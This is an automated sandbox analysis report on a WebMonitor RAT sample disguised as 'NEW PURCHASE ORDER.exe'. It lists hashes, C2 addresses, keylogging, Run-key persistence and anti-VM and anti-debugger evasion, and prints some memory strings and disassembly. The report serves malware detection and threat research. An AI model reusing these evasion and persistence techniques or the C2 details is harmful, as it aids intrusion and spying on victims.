Play interactive tour

Edit tour

Windows Analysis Report NEW PURCHASE ORDER.exe

Overview

General Information

Sample Name:	NEW PURCHASE ORDER.exe
Analysis ID:	463856
MD5:	bcb77b64ef4a369f8b381aff4c6f1c57
SHA1:	4624958cd8a724ad01868331d9a78a64fb0cdcb0
SHA256:	142cf7f01ff7c99da5e16196325e3fa3a6d867ff0e50696d727c92696ba97ccf
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

WebMonitor RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected WebMonitor RAT

Contain functionality to detect virtual machines

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to register a low level keyboard hook

Creates autostart registry keys with suspicious names

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Maps a DLL or memory area into another process

Potentially malicious time measurement code found

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

NEW PURCHASE ORDER.exe (PID: 5772 cmdline: 'C:\Users\user\Desktop\NEW PURCHASE ORDER.exe' MD5: BCB77B64EF4A369F8B381AFF4C6F1C57)

NEW PURCHASE ORDER.exe (PID: 5940 cmdline: 'C:\Users\user\Desktop\NEW PURCHASE ORDER.exe' MD5: BCB77B64EF4A369F8B381AFF4C6F1C57)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.223260400.00000000021D0000.00000040.00000001.sdmp	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
Process Memory Space: NEW PURCHASE ORDER.exe PID: 5772	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.1.NEW PURCHASE ORDER.exe.400000.0.raw.unpack	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
2.2.NEW PURCHASE ORDER.exe.400000.0.unpack	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
2.1.NEW PURCHASE ORDER.exe.400000.0.unpack	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
2.2.NEW PURCHASE ORDER.exe.400000.0.raw.unpack	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
0.2.NEW PURCHASE ORDER.exe.21d0000.2.unpack	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
0.2.NEW PURCHASE ORDER.exe.21d0000.2.raw.unpack	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: NEW PURCHASE ORDER.exe	Virustotal: Detection: 54%			Perma Link
Source: NEW PURCHASE ORDER.exe	ReversingLabs: Detection: 56%

Source: NEW PURCHASE ORDER.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 45.153.186.90:443 -> 192.168.2.3:49740 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: NEW PURCHASE ORDER.exe, 00000000.00000003.218814741.00000000023C0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: NEW PURCHASE ORDER.exe, 00000000.00000003.218814741.00000000023C0000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_0048A5D5 FindFirstFileExW,__Read_dir,FindClose,std::tr2::sys::_Strcpy,	2_2_0048A5D5
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004BB930 FindFirstFileExA,	2_2_004BB930
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_1_0048A5D5 FindFirstFileExW,__Read_dir,FindClose,std::tr2::sys::_Strcpy,	2_1_0048A5D5

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2032361 ET TROJAN WebMonitor/RevCode RAT CnC Domain in DNS Lookup 192.168.2.3:58784 -> 8.8.8.8:53

Source: Joe Sandbox View	IP Address: 194.58.200.20 194.58.200.20
Source: Joe Sandbox View	IP Address: 45.153.186.90 45.153.186.90

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.2.4.8
Source: unknown	UDP traffic detected without corresponding DNS query: 1.2.4.8
Source: unknown	UDP traffic detected without corresponding DNS query: 114.114.114.114
Source: unknown	UDP traffic detected without corresponding DNS query: 114.114.114.114
Source: unknown	UDP traffic detected without corresponding DNS query: 114.114.114.114
Source: unknown	UDP traffic detected without corresponding DNS query: 114.114.114.114
Source: unknown	UDP traffic detected without corresponding DNS query: 114.114.114.114
Source: unknown	UDP traffic detected without corresponding DNS query: 114.114.114.114
Source: unknown	UDP traffic detected without corresponding DNS query: 114.114.114.114
Source: unknown	UDP traffic detected without corresponding DNS query: 114.114.114.114

Source: unknown

DNS traffic detected: queries for: sdns.se

Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483870501.0000000000899000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: NEW PURCHASE ORDER.exe, 00000002.00000003.360088164.00000000008E2000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483135207.000000000080F000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483135207.000000000080F000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp	String found in binary or memory: https://0.0.0.0/recv5.php
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp, NEW PURCHASE ORDER.exe, 00000002.00000002.483645449.0000000000856000.00000004.00000020.sdmp	String found in binary or memory: https://0/recv5.php
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483645449.0000000000856000.00000004.00000020.sdmp	String found in binary or memory: https://0/recv5.phpAao2
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483645449.0000000000856000.00000004.00000020.sdmp	String found in binary or memory: https://0/recv5.phpL
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp	String found in binary or memory: https://niiarmah.wm01.to/
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp, NEW PURCHASE ORDER.exe, 00000002.00000002.486996734.0000000003112000.00000004.00000001.sdmp	String found in binary or memory: https://niiarmah.wm01.to/recv5.php
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483135207.000000000080F000.00000004.00000020.sdmp	String found in binary or memory: https://niiarmah.wm01.to/recv5.phpC
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp	String found in binary or memory: https://niiarmah.wm01.to/recv5.phpLp
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483870501.0000000000899000.00000004.00000020.sdmp	String found in binary or memory: https://niiarmah.wm01.to/recv5.phpU
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp	String found in binary or memory: https://niiarmah.wm01.to/recv5.phpp

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown

HTTPS traffic detected: 45.153.186.90:443 -> 192.168.2.3:49740 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_0043656A SetWindowsHookExW 0000000D,0043527C,00000000

2_2_0043656A

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Jump to behavior

System Summary:

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: NEW PURCHASE ORDER.exe

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004382E8 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,		2_2_004382E8
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_1_004382E8 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,		2_1_004382E8

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 0_2_00401928	0_2_00401928
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004AFFF3	2_2_004AFFF3
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004B5179	2_2_004B5179
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_0043C25A	2_2_0043C25A
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004A444D	2_2_004A444D
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004A467C	2_2_004A467C
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004B48E4	2_2_004B48E4
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004A48AB	2_2_004A48AB
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004BFB2B	2_2_004BFB2B
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_0049FC6A	2_2_0049FC6A
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004A0C10	2_2_004A0C10
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004A8FD0	2_2_004A8FD0
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_1_004AFFF3	2_1_004AFFF3
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_1_004B5179	2_1_004B5179
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_1_0043C25A	2_1_0043C25A
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_1_004A444D	2_1_004A444D
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_1_004A467C	2_1_004A467C

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: String function: 004AE205 appears 34 times
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: String function: 0049D90B appears 173 times
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: String function: 0049DF50 appears 70 times
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: String function: 0049D93F appears 71 times

Source: NEW PURCHASE ORDER.exe, 00000000.00000003.218138982.000000000256F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs NEW PURCHASE ORDER.exe
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.484142408.0000000002290000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs NEW PURCHASE ORDER.exe
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483052618.00000000007E0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameAVICAP32.DLL.MUIj% vs NEW PURCHASE ORDER.exe
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.487701788.0000000003310000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs NEW PURCHASE ORDER.exe
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.487754326.0000000003320000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs NEW PURCHASE ORDER.exe
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.486723891.00000000030B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs NEW PURCHASE ORDER.exe
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.486774552.00000000030C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs NEW PURCHASE ORDER.exe

Source: NEW PURCHASE ORDER.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@31/3

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_00447818 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,		2_2_00447818
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_1_00447818 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,		2_1_00447818

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_00446B77 CreateToolhelp32Snapshot,GetLastError,Process32FirstW,Process32NextW,GetLastError,CloseHandle,

2_2_00446B77

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

File created: C:\Users\user\Desktop\d70d27bc.bin

Jump to behavior

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Mutant created: \Sessions\1\BaseNamedObjects\4EcDHH7aWbl50LayUnuRlJWUXiKQWk0O2.00

Source: NEW PURCHASE ORDER.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: NEW PURCHASE ORDER.exe	Virustotal: Detection: 54%
Source: NEW PURCHASE ORDER.exe	ReversingLabs: Detection: 56%

Source: NEW PURCHASE ORDER.exe	String found in binary or memory: </install>
Source: NEW PURCHASE ORDER.exe	String found in binary or memory: <install>N/A</install>
Source: NEW PURCHASE ORDER.exe	String found in binary or memory: IN-ADDR.ARPA

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

File read: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe 'C:\Users\user\Desktop\NEW PURCHASE ORDER.exe'
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Process created: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe 'C:\Users\user\Desktop\NEW PURCHASE ORDER.exe'
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Process created: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe 'C:\Users\user\Desktop\NEW PURCHASE ORDER.exe'	Jump to behavior

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: NEW PURCHASE ORDER.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: NEW PURCHASE ORDER.exe, 00000000.00000003.218814741.00000000023C0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: NEW PURCHASE ORDER.exe, 00000000.00000003.218814741.00000000023C0000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Unpacked PE file: 2.2.NEW PURCHASE ORDER.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.data:W;.idata:R;.rsrc:R;

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_004382E8 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,

2_2_004382E8

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_0040585D push esi; ret	2_2_00405866
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_0049D8D4 push ecx; ret	2_2_0049D8E7
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_00402EEC push eax; retn 0049h	2_2_00402EED
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_00402F54 push eax; retn 0049h	2_2_00402F55
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_00402F20 push eax; retn 0049h	2_2_00402F21
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_0049DF96 push ecx; ret	2_2_0049DFA9

Boot Survival:

Creates autostart registry keys with suspicious names

Show sources

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WebMonitor-70bc

Jump to behavior

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WebMonitor-70bc			Jump to behavior
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WebMonitor-70bc			Jump to behavior

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Malware Analysis System Evasion:

Contain functionality to detect virtual machines

Show sources

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: VMwareVMware VBoxVBoxVBox		2_2_00438696
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: VMwareVMware VBoxVBoxVBox		2_1_00438696

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: NEW PURCHASE ORDER.exe

Binary or memory string: WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

RDTSC instruction interceptor: First address: 0000000000438426 second address: 0000000000438430 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 call dword ptr [004F0034h] 0x0000000a jmp dword ptr [74B710C0h] 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 mov eax, dword ptr [eax+18h] 0x00000019 ret 0x0000001a rdtsc

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Memory allocated: 2D90000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Memory allocated: 2D90000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Memory allocated: 2D90000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Memory allocated: 2D90000 memory commit \| memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_00438418 rdtsc

2_2_00438418

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Window / User API: threadDelayed 6549

Jump to behavior

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe TID: 5760

Thread sleep count: 6549 > 30

Jump to behavior

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_0048A5D5 FindFirstFileExW,__Read_dir,FindClose,std::tr2::sys::_Strcpy,	2_2_0048A5D5
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004BB930 FindFirstFileExA,	2_2_004BB930
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_1_0048A5D5 FindFirstFileExW,__Read_dir,FindClose,std::tr2::sys::_Strcpy,	2_1_0048A5D5

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_004C348E VirtualQuery,GetSystemInfo,

2_2_004C348E

Source: NEW PURCHASE ORDER.exe	Binary or memory string: Hyper-V
Source: NEW PURCHASE ORDER.exe, 00000002.00000003.231408515.000000000083C000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: NEW PURCHASE ORDER.exe, 00000002.00000003.231408515.000000000083C000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareLWWG1B1YWin32_VideoControllerDKCH2LYXVideoController120060621000000.000000-00073122452display.infMSBDARUPU8YUZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsTOAE4H33LMEMp
Source: NEW PURCHASE ORDER.exe, 00000002.00000003.220488913.000000000081B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Serviceice}[))
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp	Binary or memory string: Cx</block><block><block></block></block><block></data></data><block>.bin\</date>%Y-%m-%d %I:%M:%S<date><data><title></title>{F1}{F2}{F3}{F4}{F5}{F6}{F7}{F8}{F9}{F10}{F11}{F12}{F13}{F14}{F15}{F16}{NUMPAD_0}{NUMPAD_1}{NUMPAD_2}{NUMPAD_3}{NUMPAD_4}{NUMPAD_5}{NUMPAD_6}{NUMPAD_7}{NUMPAD_8}{NUMPAD_9}{NUMPAD_MULTIPLY}{NUMPAD_ADD}{NUMPAD_SEPARATOR}{NUMPAD_SUBTRACT}{NUMPAD_DECIMAL}{NUMPAD_DIVIDE}{ENTER}{CTRL} {SHIFT}{CAPSLOCK}{ESC}{MENU}{HELP}{CLEAR}{TAB}{BACKSPACE}{PRTSCR}{SELECT}{EXECUTE}{SCROLL}{PAUSE}{INS}{HOME}{PAGEUP}{PAGEDOWN}{DEL}{END}{UP}{DOWN}{LEFT}{RIGHT}{NUMLOCK}KEYLOG: KEYLOG STEAM SENT: send_keylog_stream_data</block><block></block><block>kernel32.dllKernel32.dllNtQueryInformationProcessNTDLL.DLLSYSTEM\CurrentControlSet\Control\Terminal Server\GlassSessionIdKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMprl hyperv VBoxVBoxVBoxROOT\CIMV2SELECT * FROM Win32_VideoControllerCaptionHyper-VMicrosoft Basic Display AdapterVMWare%ThisIsAnInvalidEnvironmentVariableName?[]<>@\;!-{}#:/~%%ThisIsAnInvalidFileName?[]<>@\;!-{}#:/~%VirtualAlloc failed. Last error: %u
Source: NEW PURCHASE ORDER.exe	Binary or memory string: VMwareVMware
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483135207.000000000080F000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: NEW PURCHASE ORDER.exe	Binary or memory string: VMWare
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW'
Source: NEW PURCHASE ORDER.exe, 00000002.00000003.220488913.000000000081B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Serviceeov
Source: NEW PURCHASE ORDER.exe, 00000002.00000003.220488913.000000000081B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Servicevider
